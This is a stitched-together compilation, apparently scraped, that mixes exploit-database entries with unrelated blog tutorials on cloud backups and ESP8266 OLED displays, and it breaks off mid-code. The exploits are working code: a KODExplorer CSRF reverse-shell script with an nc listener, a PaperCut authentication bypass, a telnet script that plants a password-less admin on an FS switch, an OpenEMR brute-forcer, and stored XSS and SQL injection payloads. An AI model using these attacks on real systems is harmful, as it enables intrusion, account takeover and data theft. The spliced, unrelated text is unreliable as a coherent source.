    print(f'[+] After the victim opens the URI, his shell will be hosted at\n'
          f'{url}/data/User/admin/home/shell.php?cmd=whoami')


def reverseshell(url, lhost):
    rvpayload = 'https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php'
    targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ')
    lport = input('[*] Your local port: ')
    # Fetch pentestmonkey's PHP reverse shell and patch in our host and port
    reqpayload = requests.get(rvpayload).text
    reqpayload = reqpayload.replace('127.0.0.1', lhost)
    reqpayload = reqpayload.replace('1234', lport)
    write_shell(reqpayload)
    print('[*] Opening HTTPd port')
    th = threading.Thread(target=httpd)
    th.start()
    print(f'[+] Send this URI to your target:\n{csrf_uri(url, lhost, targetpath)}')
    input(f'[*] Run the command "nc -lnvp {lport}" to receive the connection and press any key\n')
    while True:
        # Requesting the uploaded file runs it; a read timeout after the server accepted the
        # request means the shell is holding the response open, i.e. it is running
        try:
            hitshell = requests.get(f'{url}/data/User/admin/home/shell.php', timeout=10)
        except requests.exceptions.ReadTimeout:
            print('[+] Shell sent and executed!')
            break
        except requests.RequestException:
            sleep(1)
            continue
        if hitshell.status_code == 200:
            print('[+] Shell sent and executed!')
            break
        sleep(1)


def main(url, lhost, mode):
    banner()
    if mode == 'webshell':
        webshell(url, lhost)
    elif mode == 'reverse':
        reverseshell(url, lhost)
    else:
        print('[-] There is no such mode. Use webshell or reverse')


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--url', action='store', help='target url', dest='url', required=True)
    parser.add_argument('-lh', '--local-host', action='store', help='local host', dest='lhost', required=True)
    parser.add_argument('-m', '--mode', action='store', help='mode (webshell, reverse)', dest='mode', required=True)
    arguments = parser.parse_args()
    main(arguments.url, arguments.lhost, arguments.mode)
# Exploit Title: PaperCut NG/MG 22.0.4 - Authentication Bypass
# Date: 21 April 2023
# Exploit Author: MaanVader
# Vendor Homepage: https://www.papercut.com/
# Version: 8.0 or later
# Tested on: 22.0.4
# CVE: CVE-2023-27350
import requests
from bs4 import BeautifulSoup
import re


def vuln_version():
    ip = input("Enter the ip address: ")
    # SetupCompleted is the page the bypass goes through: the steps printed below visit it
    # first and then open the Dashboard without ever logging in
    url = "http://" + ip + ":9191" + "/app?service=page/SetupCompleted"
    response = requests.get(url, timeout=10)
    soup = BeautifulSoup(response.text, 'html.parser')
    text_div = soup.find('div', class_='text')
    if text_div is None:
        # No version banner on the page: the check below has nothing to work with
        print('Not Vulnerable')
        return
    # Search for the first span element containing a version number
    version_span = None
    for span in text_div.find_all('span'):
        version_match = re.match(r'^\d+\.\d+\.\d+$', span.text.strip())
        if version_match:
            version_span = span
            break
    if version_span is None:
        print('Not Vulnerable')
    else:
        # The check is a heuristic on the banner; CVE-2023-27350 is fixed in 20.1.7,
        # 21.2.11 and 22.0.9, so compare the printed version against those before acting
        version_str = version_span.text.strip()
        print('Version:', version_str)
        print("Vulnerable version")
        print(f"Step 1 visit this url first in your browser: {url}")
        print(f"Step 2 visit this url in your browser to bypass the login page : http://{ip}:9191/app?service=page/Dashboard")


if __name__ == "__main__":
    vuln_version()
I have previously written up how to back up FTP and database content from a Linux VPS automatically every day, but that method requires you to run your own FTP space, which is more trouble than this one. If you have no FTP space, you can sign up for Qiniu Cloud Storage: the free 10 GB is enough to back up an ordinary small site. Below is a script that backs up website files and databases to Qiniu; in practice it works well, and with a scheduled task on the VPS it runs automatically every day. The script's GitHub project: https://github.com/ccbikai/backuptoqiniu
First register a Qiniu Cloud account; after real-name verification you get 10 GB of storage and traffic. Then open Object Storage in the left-hand menu, create a new bucket, and note its name, which you will need later.
Method
Note: the system Python version must be 2.7 or later.
1. Install zip
apt-get install zip
On CentOS the command is:
yum install zip
2. Install the backup script
wget --no-check-certificate -O backuptoqiniu.zip https://www.moerats.com/usr/down/backuptoqiniu.zip
unzip backuptoqiniu.zip
cd backuptoqiniu
python setup.py install
Downloading with certificate checking disabled and then installing the result as root means anyone who can tamper with that connection can run code on your server; prefer cloning the GitHub project linked above and read the script before installing it.
3. Edit the configuration file
Edit it with vi backuptoqiniu.sh or with a tool such as WinSCP:
##Backup Configuration Information ##
#Backup name, used as a label
BACKUP_NAME='backup'
#Directories to back up; separate multiple entries with spaces
BACKUP_SRC='/home/wwwroot/moerats.com'
#MySQL host address
MYSQL_SERVER='localhost'
#MySQL username
MYSQL_USER='root'
#MySQL password
MYSQL_PASS='mysqlpassword'
#Databases to back up; separate multiple entries with spaces
MYSQL_DBS='dbname'
#Temporary directory for the archive; normally no change is needed
BACKUP_DIR='/tmp/backuptoqiniu'
#Password applied to the backup archive so the uploaded package is not readable in the clear
BACKUP_FILE_PASSWD='123456'
##Backup Configuration Information End ##
##Qiniu Configuration Information ##
#Bucket name: the storage space we created on Qiniu
QINIU_BUCKET='Rats'
QINIU_ACCESS_KEY='ACCESS_KEY'
QINIU_SECRET_KEY='SECRET_KEY'
##Qiniu Configuration Information End ##
The configuration above is largely self-explanatory. The first half describes the website; the last three lines come from Qiniu: QINIU_BUCKET is the bucket name, and ACCESS_KEY and SECRET_KEY are found in the personal panel under key management, as the long AK and SK strings.
Two cautions. This file holds the MySQL root password and the Qiniu keys in plain text, so keep it readable only by root (chmod 600 backuptoqiniu.sh) and prefer a dedicated MySQL user with only the privileges mysqldump needs rather than root. Replace '123456' with a long random password: anyone who obtains the uploaded archive can try passwords offline, and if the script relies on zip's built-in password protection (ZipCrypto) that scheme is weak on its own, so treat it as a second layer behind a private bucket rather than the only one.
4. Test the script
chmod +x backuptoqiniu.sh
./backuptoqiniu.sh
Once it runs cleanly, check in the Qiniu console whether a compressed package has appeared in the new bucket.
5. Run the script automatically
crontab -e
Add this line:
0 2 * * * /root/backuptoqiniu/backuptoqiniu.sh
This crontab entry runs the script at 2 a.m. every day. The fifth field must be * for a daily run; a 0 there would restrict it to Sundays. For details on crontab, see the article on installing Crontab and scheduling tasks on a Linux system.
Note: a VPS often needs to run scripts or restart certain software on a schedule, and Crontab is the tool for that.
Note: if your VPS is abroad, you may also want to set it to China Standard Time with cp /usr/share/zoneinfo/Asia/Shanghai /etc/localtime.
Then service cron restart activates the schedule.
The result (screenshot in the original post): the backup files are visible in Qiniu Cloud.
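As an added example, my code and not the backuptoqiniu script or anything from the original post, a Python sketch of the same backup flow with the secrets handled differently: credentials live in a separate file that must be mode 0600, the MySQL password reaches mysqldump through a defaults file instead of the command line, and the archive is encrypted with openssl instead of a zip password. The INI layout, file names and the demo() helper are my own assumptions; the upload to Qiniu is left to the project's own tooling.

```python
import configparser
import datetime
import os
import shutil
import stat
import subprocess
import tempfile

# Assumed secrets-file layout (my own, not the backuptoqiniu format)
SECRETS_EXAMPLE = """\
[mysql]
host = localhost
user = backup
password = change-me

[qiniu]
bucket = Rats
access_key = ACCESS_KEY
secret_key = SECRET_KEY
"""
EXAMPLE_TIME = datetime.datetime(2023, 4, 28, 2, 0, 0)


def load_secrets(path):
    """Read credentials from an INI file, refusing one that group or others can read."""
    if os.stat(path).st_mode & (stat.S_IRWXG | stat.S_IRWXO):
        raise PermissionError(f'{path} must be mode 0600 (run: chmod 600 {path})')
    cfg = configparser.ConfigParser()
    cfg.read(path)
    return cfg


def write_mysql_defaults(dest, host, user, password):
    """Write a [client] defaults file, created 0600, so the password never shows in `ps`."""
    fd = os.open(dest, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, 'w') as f:
        f.write(f'[client]\nhost={host}\nuser={user}\npassword={password}\n')
    return dest


def mysqldump_cmd(defaults_file, db, out_path):
    """mysqldump argv; --defaults-extra-file has to be the first option."""
    return ['mysqldump', f'--defaults-extra-file={defaults_file}',
            '--single-transaction', f'--result-file={out_path}', db]


def archive_name(backup_name, now=None):
    now = now or datetime.datetime.now()
    return f'{backup_name}_{now:%Y%m%d_%H%M%S}.tar.gz.enc'


def encrypt_archive(src_paths, passphrase_file, dest):
    """tar+gzip the sources and encrypt the stream with AES-256-CBC (PBKDF2-derived key)."""
    tar = subprocess.Popen(['tar', 'czf', '-'] + list(src_paths), stdout=subprocess.PIPE)
    subprocess.run(['openssl', 'enc', '-aes-256-cbc', '-pbkdf2', '-salt',
                    '-pass', f'file:{passphrase_file}', '-out', dest],
                   stdin=tar.stdout, check=True)
    tar.stdout.close()
    if tar.wait() != 0:
        raise RuntimeError('tar failed')
    return dest


def decrypt_archive(src, passphrase_file, dest):
    """Inverse of encrypt_archive; run it regularly, a backup you cannot restore is no backup."""
    subprocess.run(['openssl', 'enc', '-d', '-aes-256-cbc', '-pbkdf2',
                    '-pass', f'file:{passphrase_file}', '-in', src, '-out', dest], check=True)
    return dest


def demo():
    """Exercise every piece in a scratch directory and report the outcomes."""
    work = tempfile.mkdtemp(prefix='backupdemo_')
    out = {'roundtrip': None}  # stays None when tar/openssl are absent or too old
    try:
        secrets = os.path.join(work, 'secrets.ini')
        with os.fdopen(os.open(secrets, os.O_WRONLY | os.O_CREAT, 0o600), 'w') as f:
            f.write(SECRETS_EXAMPLE)
        cfg = load_secrets(secrets)
        os.chmod(secrets, 0o644)  # simulate the mistake the permission check catches
        try:
            load_secrets(secrets)
            out['rejects_world_readable'] = False
        except PermissionError:
            out['rejects_world_readable'] = True
        my_cnf = write_mysql_defaults(os.path.join(work, 'my.cnf'), cfg['mysql']['host'],
                                      cfg['mysql']['user'], cfg['mysql']['password'])
        out['defaults_mode'] = stat.S_IMODE(os.stat(my_cnf).st_mode)
        out['cmd'] = mysqldump_cmd(my_cnf, 'dbname', os.path.join(work, 'dbname.sql'))
        if shutil.which('tar') and shutil.which('openssl'):
            passfile = os.path.join(work, 'archive.pass')
            with os.fdopen(os.open(passfile, os.O_WRONLY | os.O_CREAT, 0o600), 'w') as f:
                f.write('correct horse battery staple\n')
            sample = os.path.join(work, 'site.txt')
            with open(sample, 'w') as f:
                f.write('index.html contents\n')
            try:
                enc = encrypt_archive([sample], passfile, os.path.join(work, archive_name('backup', EXAMPLE_TIME)))
                plain = decrypt_archive(enc, passfile, os.path.join(work, 'restored.tar.gz'))
                listing = subprocess.run(['tar', 'tzf', plain], capture_output=True, text=True, check=True).stdout
                out['roundtrip'] = 'site.txt' in listing
            except (subprocess.CalledProcessError, OSError):
                out['roundtrip'] = None
    finally:
        shutil.rmtree(work)
    return out


if __name__ == '__main__':
    print(demo())
```

The cron line from step 5 then calls a wrapper that reads the secrets file, dumps each database with mysqldump_cmd, encrypts BACKUP_SRC plus the dumps with encrypt_archive, and hands the .enc file to the Qiniu upload. Because the passphrase sits in its own 0600 file, rotating it does not touch the script, and decrypt_archive gives you a restore drill to schedule alongside the backup.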
# Exploit Title: FS-S3900-24T4S Privilege Escalation
# Date: 29/04/2023
# Exploit Author: Daniele Linguaglossa & Alberto Bruscino
# Vendor Homepage: https://www.fs.com/
# Software Link: not available
# Version: latest
# Tested on: latest
# CVE : CVE-2023-30350
import sys
import telnetlib  # deprecated since Python 3.11 and removed in 3.13; run this on 3.12 or earlier


def exploit(args):
    if len(args) != 1:
        print(f"Usage: {sys.argv[0]} <ip>")
        sys.exit(1)
    ip = args[0]
    try:
        with telnetlib.Telnet(ip, 23, timeout=10) as tn:
            try:
                # Log in with the built-in guest account, enter privileged mode with the
                # default enable password, then create a password-less admin user
                tn.read_until(b"Username: ")
                tn.write(b"guest\r\n")
                tn.read_until(b"Password: ")
                tn.write(b"guest\r\n")
                tn.read_until(b">")
                tn.write(b"enable\r\n")
                tn.read_until(b"Password: ")
                tn.write(b"super\r\n")
                tn.read_until(b"#")
                tn.write(b"configure terminal\r\n")
                tn.read_until(b"(config)#")
                tn.write(b"username admin nopassword\r\n")
                tn.read_until(b"(config)#")
                print("Exploit success, you can now login with username: admin and password: <empty>")
            except (KeyboardInterrupt, EOFError):
                # EOFError: the switch closed the session before a prompt matched
                print("Exploit failed")
    except (ConnectionRefusedError, OSError):
        print("Connection refused")


if __name__ == "__main__":
    exploit(sys.argv[1:])
# Exploit Title: OpenEMR v7.0.1 - Authentication credentials brute force
# Date: 2023-04-28
# Exploit Author: abhhi (Abhishek Birdawade)
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v7_0_1.tar.gz
# Version: 7.0.1
# Tested on: Windows
'''
Example Usage:
- python3 exploitBF.py -l "http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default" -u username -p pass.txt
'''
import requests
import sys
import argparse, textwrap
from pwn import *

#Expected Arguments
parser = argparse.ArgumentParser(description="OpenEMR <= 7.0.1 Authentication Bruteforce Mitigation Bypass", formatter_class=argparse.RawTextHelpFormatter,
                                 epilog=textwrap.dedent('''
    Exploit Usage :
    python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -u username -p pass.txt
    python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul user.txt -p pass.txt
    python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul /Directory/user.txt -p /Directory/pass.txt'''))
parser.add_argument("-l", "--url", help="Path to OpenEMR (Example: http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default)")
parser.add_argument("-u", "--username", help="Username to Bruteforce for.")
parser.add_argument("-ul", "--userlist", help="Username Dictionary")
parser.add_argument("-p", "--passlist", help="Password Dictionary")
args = parser.parse_args()

if len(sys.argv) < 2:
    print(f"Exploit Usage: python3 exploitBF.py -h")
    sys.exit(1)

# Variable
LoginPage = args.url
Username = args.username
Username_list = args.userlist
Password_list = args.passlist
if not LoginPage or not Password_list or not (Username or Username_list):
    parser.error("-l and -p are required, together with either -u or -ul")

log.info('OpenEMR Authentication Brute Force Mitigation Bypass Script by abhhi \n ')
# Progress Check: one progress line for the whole run, updated per attempt
process = log.progress('Brute Force')


def login(Username, Password):
    # Fresh session per attempt; the GET picks up the session cookie the login form expects
    session = requests.session()
    r = session.get(LoginPage)
    #Specifying Headers Value
    headerscontent = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
        'Referer': f"{LoginPage}",
        'Origin': f"{LoginPage}",
    }
    #POST REQ data
    postreqcontent = {
        'new_login_session_management': 1,
        'languageChoice': 1,
        'authUser': f"{Username}",
        'clearPass': f"{Password}"
    }
    #Sending POST REQ
    r = session.post(LoginPage, data=postreqcontent, headers=headerscontent, allow_redirects=False)
    #Printing Username:Password
    process.status('Testing -> {U}:{P}'.format(U=Username, P=Password))
    #Conditional loops: a valid login is answered with a redirect to the main tabs page
    if 'Location' in r.headers:
        if "/interface/main/tabs/main.php" in r.headers['Location']:
            print()
            log.info(f'SUCCESS !!')
            log.success(f"Use Credential -> {Username}:{Password}")
            sys.exit(0)


#Reading User.txt & Pass.txt files (a single -u username is used when no -ul list is given)
if Username_list:
    usernames = [line.strip() for line in open(Username_list).readlines()]
else:
    usernames = [Username]
passfile = [line.strip() for line in open(Password_list).readlines()]
for Username in usernames:
    for Password in passfile:
        login(Username, Password)
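On the defensive side, an added example (mine, not part of the advisory) of what the login loop above leaves in a web-server access log and how to flag it. The log lines are constructed, and the status assumption is mine: a failed login re-renders main_screen.php with 200, while a success is the 302 redirect to /interface/main/tabs/main.php that the script checks for in the Location header.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOGIN_PATH = '/interface/main/main_screen.php'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

# Constructed sample in Apache combined-log style; not taken from any real OpenEMR host.
# Assumption: failed login -> 200 (form re-rendered), successful login -> 302 to tabs/main.php.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Apr/2023:10:00:01 +0000] "POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0)"
10.0.0.5 - - [28/Apr/2023:10:00:02 +0000] "POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0)"
10.0.0.5 - - [28/Apr/2023:10:00:03 +0000] "POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0)"
10.0.0.7 - - [28/Apr/2023:10:00:04 +0000] "POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0)"
10.0.0.5 - - [28/Apr/2023:10:00:04 +0000] "POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0)"
10.0.0.5 - - [28/Apr/2023:10:00:05 +0000] "POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0)"
10.0.0.7 - - [28/Apr/2023:10:00:09 +0000] "POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0)"
10.0.0.5 - - [28/Apr/2023:10:00:06 +0000] "POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0)"
10.0.0.5 - - [28/Apr/2023:10:00:40 +0000] "POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1" 302 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0)"
10.0.0.5 - - [28/Apr/2023:10:00:41 +0000] "GET /interface/main/tabs/main.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0)"
"""


def parse_line(line):
    """Return ip, timestamp, method, path (query string stripped) and status, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        'ip': m['ip'],
        'ts': datetime.strptime(m['ts'], '%d/%b/%Y:%H:%M:%S %z'),
        'method': m['method'],
        'path': m['path'].split('?', 1)[0],
        'status': int(m['status']),
    }


def find_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """
    Flag source IPs with at least `threshold` failed login POSTs inside any `window`,
    and record whether a successful login followed the last failure (a found credential).
    """
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        e = parse_line(line)
        if e and e['method'] == 'POST' and e['path'] == LOGIN_PATH:
            by_ip[e['ip']].append((e['ts'], e['status']))
    alerts = {}
    for ip, events in by_ip.items():
        events.sort()
        failures = [ts for ts, status in events if status == 200]
        peak, lo = 0, 0
        for hi, ts in enumerate(failures):  # sliding window over the sorted failure times
            while ts - failures[lo] > window:
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak >= threshold:
            last_fail = failures[-1]
            success = any(status == 302 and ts >= last_fail for ts, status in events)
            alerts[ip] = {'failures_in_window': peak, 'success_after': success}
    return alerts


if __name__ == '__main__':
    for ip, info in find_bruteforce(SAMPLE_LOG).items():
        print(ip, info)
```

The script spoofs a Firefox User-Agent, so the rule keys on request rate and status sequence rather than on the agent string. A single user mistyping twice (10.0.0.7 in the sample) stays below the threshold; the entry that does fire carries success_after, which is the signal to reset that account rather than just block the source.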
# Exploit Title: PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS)
# Date: 2023-04-29
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.phpjabbers.com/faq.php
# Software Link: https://www.phpjabbers.com/simple-cms/
# Version: 5.0
# Tested on: Kali Linux
### Steps to Reproduce ###
- Log in at this address:
https://localhost/simplecms/index.php?controller=pjAdmin&action=pjActionLogin
- Click the "Add Section" button.
- Enter the payload "><img src=x onerror=alert("Stored")> in the "Section" box and save it.
- An alert reading "Stored" appears. The payload is saved with the section, so it executes again whenever the section is rendered.
### PoC Request ###
POST /simplecms/index.php?controller=pjAdminSections&action=pjActionCreate HTTP/1.1
Host: localhost
Cookie: pj_sid=PJ1.0.6199026527.1682777172; pj_so=PJ1.0.6771252593.1682777172; pjd_1682777220_628=1; PHPSESSID=bmannt0kqjm2m0vmb5vj1dbu57; simpleCMS=ejrnh4bmb0ems1j4e4r9fq4eq1; pjd=7l9bb4ubmknrdbns46j7g5cqn7
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 371
Origin: https://localhost
Referer: https://localhost/simplecms/index.php?controller=pjAdminSections&action=pjActionCreate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

section_create=1&i18n%5B1%5D%5Bsection_name%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%3E&i18n%5B2%5D%5Bsection_name%5D=&i18n%5B3%5D%5Bsection_name%5D=&i18n%5B1%5D%5Bsection_content%5D=%3Cp%3E%22%26gt%3B%26lt%3Bimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%26gt%3B%3C%2Fp%3E&i18n%5B2%5D%5Bsection_content%5D=&i18n%5B3%5D%5Bsection_content%5D=&url=&status=T
Equipment list
- esp8266 development board
- OLED display (0.96")
- DuPont wires
Equipment circuit diagram (image in the original post)
Add library
u8g2 library file
Project 1: Hello World
/*
HelloWorld.ino
esp8266+oled project example
Forum: bbskali.cn
Blog: blog.bbskali.cn
*/
#include <Arduino.h>
#include <U8g2lib.h>
#ifdef U8X8_HAVE_HW_SPI
#include <SPI.h>
#endif
#ifdef U8X8_HAVE_HW_I2C
#include <Wire.h>
#endif
U8G2_SSD1306_128X64_NONAME_F_SW_I2C u8g2(U8G2_R0, /* clock=*/D2, /* data=*/D1, /* reset=*/U8X8_PIN_NONE); // D1 and D2 are the pins the display is wired to
void setup(void) {
  u8g2.begin();
}
void loop(void) {
  u8g2.clearBuffer();                   // clear the internal memory
  u8g2.setFont(u8g2_font_ncenB08_tr);   // choose a suitable font
  u8g2.drawStr(0, 10, "Hello World!");  // write something to the internal memory
  u8g2.sendBuffer();                    // transfer internal memory to the display
  delay(1000);
}
The effect is as follows (screenshot in the original post).
Project 2: Display Chinese characters
The code is as follows:
/*
esp8266+oled display
Show Chinese characters
Forum: bbskali.cn
Blog: blog.bbskali.cn
*/
#include <Arduino.h>
#include <U8g2lib.h>
#ifdef U8X8_HAVE_HW_SPI
#include <SPI.h>
#endif
#ifdef U8X8_HAVE_HW_I2C
#include <Wire.h>
#endif
U8G2_SSD1306_128X64_NONAME_F_SW_I2C u8g2(U8G2_R0, /* clock=*/D2, /* data=*/D1, /* reset=*/U8X8_PIN_NONE); // all boards without a reset line on the display
void setup(void) {
  u8g2.begin();
  u8g2.enableUTF8Print();  // enable UTF-8 support for the Arduino print() function
}
void loop(void) {
  u8g2.setFont(u8g2_font_unifont_t_chinese2);  // chinese2 holds all the glyphs needed for a Chinese "Hello world"
  u8g2.setFontDirection(0);
  u8g2.clearBuffer();
  u8g2.setCursor(0, 15);
  u8g2.print("kali forum");
  u8g2.setCursor(0, 30);
  u8g2.print("bbskali.cn");  // the original post prints the Chinese "Hello World" here
  u8g2.setCursor(0, 45);
  u8g2.print("kali Hacker Teaching");
  u8g2.sendBuffer();
  delay(1000);
}
The effect is as follows (screenshot in the original post).
Project 3: Display multiple lines of text
The code is as follows:
/*
esp8266+oled display: scroll a multi-line UTF-8 text
*/
#include <Arduino.h>
#include <U8g2lib.h>
#ifdef U8X8_HAVE_HW_SPI
#include <SPI.h>
#endif
#ifdef U8X8_HAVE_HW_I2C
#include <Wire.h>
#endif
U8G2_SSD1306_128X64_NONAME_1_SW_I2C u8g2(U8G2_R0, /* clock=*/D2, /* data=*/D1, /* reset=*/U8X8_PIN_NONE); // all boards without a reset line on the display
#define FONT u8g2_font_wqy14_t_gb2312b
//#define FONT u8g2_font_wqy16_t_chinese1
//#define FONT u8g2_font_wqy16_t_gb2312b
// The next two macros define the scroll speed of the short story
#define SCROLL_DELTA 2
#define SCROLL_DELAY 200
const char c_str[] =
  "Shen Nong\n\n"
  "KALI Forum Introduction\n"
  "kali forum was created at 20\n"
  "17, Webmaster Priess\n"
  "This forum is based on kali"
  "Full Research and Cybersecurity\n"
  "For the convenience of friends' learning\n"
  "We built this forum\n"
  "Forum study is completely free\n"
  "Our URL :\n"
  "bbskali,cn\n"
  "WeChat official account:\n"
  "【kali Hacker Teaching】\n"
  "Thank you for your attention. \n";
char buf[48];               // at most 8 Chinese glyphs per line at 3 bytes each is 24; 48 leaves headroom
uint8_t total_lines;        // the total number of lines in the story
uint8_t i;                  // loop variable for the lines
uint8_t line_cnt;           // number of lines to draw, usually equal to lines_per_draw
uint8_t start_line;         // topmost visible line, derived from top_window_pos
uint8_t lines_per_draw;     // how many lines to draw on the screen, derived from font and display height
uint16_t glyph_height;      // height of the glyphs
uint16_t top_window_pos;    // defines the display position in pixel within the text
uint16_t total_height;      // total height in pixel, derived from font height and total_lines
u8g2_uint_t top_offset;     // offset between the first visible line and the display
void setup(void) {
  /* U8g2 Project: SSD1306 Test Board */
  pinMode(D2, OUTPUT);
  pinMode(D1, OUTPUT);
  digitalWrite(10, 0);
  digitalWrite(9, 0);
  /* U8g2 Project: T6963 Test Board */
  //pinMode(18, OUTPUT);
  //digitalWrite(18, 1);
  /* U8g2 Project: KS0108 Test Board */
  //pinMode(16, OUTPUT);
  //digitalWrite(16, 0);
  /* U8g2 Project: LC7981 Test Board, connect RW to GND */
  //pinMode(17, OUTPUT);
  //digitalWrite(17, 0);
  /* U8g2 Project: Pax Instruments Shield: Enable Backlight */
  //pinMode(6, OUTPUT);
  //digitalWrite(6, 0);
  u8g2.begin();
  /* select a font */
  //u8g2.setFont(u8g2_font_wqy12_t_chinese1);  // two unknown glyphs
  //u8g2.setFont(u8g2_font_wqy12_t_chinese3);  // two unknown glyphs
  //u8g2.setFont(u8g2_font_wqy12_t_gb2312a);   // ';' is missing
  //u8g2.setFont(u8g2_font_wqy12_t_gb2312b);   // all glyphs available
  u8g2.setFont(FONT);
  /* calculate the length of the text in lines */
  total_lines = u8x8_GetStringLineCnt(c_str);
  /* get the height of the glyphs */
  glyph_height = u8g2.getMaxCharHeight();
  /* calculate the height of the text in pixel */
  total_height = (uint16_t)total_lines * (uint16_t)glyph_height;
  /* calculate how many lines must be drawn on the screen */
  lines_per_draw = u8g2.getDisplayHeight() / glyph_height;
  lines_per_draw += 2;
  /* start at the top of the text */
  top_window_pos = 0;
}
void loop(void) {
  start_line = top_window_pos / glyph_height;
  top_offset = top_window_pos % glyph_height;
  line_cnt = total_lines - start_line;
  if ( line_cnt > lines_per_draw )
    line_cnt = lines_per_draw;
  u8g2.firstPage();
  do {
    for ( i = 0; i < line_cnt; i++ )
    {
      /* copy a line of the text to the local buffer */
      u8x8_CopyStringLine(buf, i + start_line, c_str);
      /* draw the content of the local buffer */
      u8g2.drawUTF8(0, i * glyph_height - top_offset + glyph_height, buf);
    }
  } while ( u8g2.nextPage() );
  delay(SCROLL_DELAY);
  top_window_pos += SCROLL_DELTA;
}
# Exploit Title: PHPJabbers Simple CMS 5.0 - SQL Injection
# Date: 2023-04-29
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.phpjabbers.com/faq.php
# Software Link: https://www.phpjabbers.com/simple-cms/
# Version: 5.0
# Tested on: Kali Linux
### Request ###
GET /simplecms/index.php?action=pjActionGetFile&column=created&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10 HTTP/1.1
Accept: */*
x-requested-with: XMLHttpRequest
Referer: https://localhost/simplecms/preview.php?lid=1
Cookie: simpleCMS=lhfh97t17ahm8m375r3upfa844; _fbp=fb.1.1682777372679.72057406; pjd=2rnbhrurbqjsuajj7pnffh2292; pjd_simplecms=1; last_position=%2F
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive
### Parameter & Payloads ###
Parameter: column (GET)
The column and direction parameters select the sort order of the file listing; the payload titles below (sqlmap output) show the value landing unescaped in an ORDER BY clause, which is why a CASE expression and an EXTRACTVALUE error both work there.
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: action=pjActionGetFile&column=(SELECT (CASE WHEN (9869=9869) THEN 2 ELSE (SELECT 2339 UNION SELECT 4063) END))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: action=pjActionGetFile&column=2 AND EXTRACTVALUE(2212,CONCAT(0x5c,0x716b766271,(SELECT (ELT(2212=2212,1))),0x716b707671))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10
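An added example, my code and not PHPJabbers', that models the flaw behind the column parameter and its fix in Python with an in-memory SQLite table. The table, column names and rows are made up. ORDER BY cannot take a bound parameter, so the fix is an allow-list of sortable columns and directions; the blind oracle reproduces the CASE WHEN technique from the first payload (the EXTRACTVALUE variant is MySQL-specific and not modelled here).

```python
import sqlite3

# Constructed table; the real Simple CMS schema is not on the page
ALLOWED_COLUMNS = {'id', 'name', 'created'}
ALLOWED_DIRECTIONS = {'ASC', 'DESC'}


def _db():
    con = sqlite3.connect(':memory:')
    con.executescript("""
        CREATE TABLE files (id INTEGER PRIMARY KEY, name TEXT, created TEXT);
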